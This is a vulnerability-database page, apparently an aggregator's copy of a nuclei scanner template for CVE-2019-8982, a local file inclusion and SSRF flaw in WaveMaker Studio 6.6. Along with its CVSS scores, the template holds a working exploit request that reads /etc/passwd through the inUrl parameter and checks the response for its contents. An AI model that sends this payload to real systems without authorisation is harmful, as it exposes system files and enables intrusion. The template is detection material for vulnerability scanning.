Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2019-8982
HistoryApr 08, 2020 - 11:34 a.m.

Wavemaker Studio 6.6 - Local File Inclusion/Server-Side Request Forgery

2020-04-0811:34:01
ProjectDiscovery
github.com
11

CVSS2

6.8

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:P/I:P/A:P

CVSS3

9.6

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

AI Score

9

Confidence

High

EPSS

0.019

Percentile

88.9%

“WaveMaker Studio 6.6 mishandles the studioService.download?method=getContent&inUrl= value in com/wavemaker/studio/StudioService.java, leading to disclosure of local files and server-side request forgery.”

id: CVE-2019-8982

info:
  name: Wavemaker Studio 6.6 - Local File Inclusion/Server-Side Request Forgery
  author: madrobot
  severity: critical
  description: "WaveMaker Studio 6.6 mishandles the studioService.download?method=getContent&inUrl= value in com/wavemaker/studio/StudioService.java, leading to disclosure of local files and server-side request forgery."
  impact: |
    Successful exploitation of these vulnerabilities could lead to unauthorized access to sensitive files and potential server-side request forgery attacks.
  remediation: |
    Apply the latest security patches and updates provided by Wavemaker Studio to mitigate these vulnerabilities.
  reference:
    - https://www.exploit-db.com/exploits/45158
    - https://nvd.nist.gov/vuln/detail/CVE-2019-8982
    - https://github.com/merlinepedra25/nuclei-templates
    - https://github.com/sobinge/nuclei-templates
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
    cvss-score: 9.6
    cve-id: CVE-2019-8982
    cwe-id: CWE-918
    epss-score: 0.01814
    epss-percentile: 0.88158
    cpe: cpe:2.3:a:wavemaker:wavemarker_studio:6.6:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: wavemaker
    product: wavemarker_studio
  tags: cve,cve2019,wavemaker,lfi,ssrf,edb

http:
  - method: GET
    path:
      - "{{BaseURL}}/wavemaker/studioService.download?method=getContent&inUrl=file///etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100c8419bc77859a442fcd8d0612de209ebc80b5675ad34980b28a4d5d8e815926e022100e8ae9bdb070d9549bc1f8a3cf90261d0d0346c3621f06f65b273d9ad0c059f16:922c64590222798bb761d5b6d8e72950

CVSS2

6.8

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:P/I:P/A:P

CVSS3

9.6

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

AI Score

9

Confidence

High

EPSS

0.019

Percentile

88.9%

Related for NUCLEI:CVE-2019-8982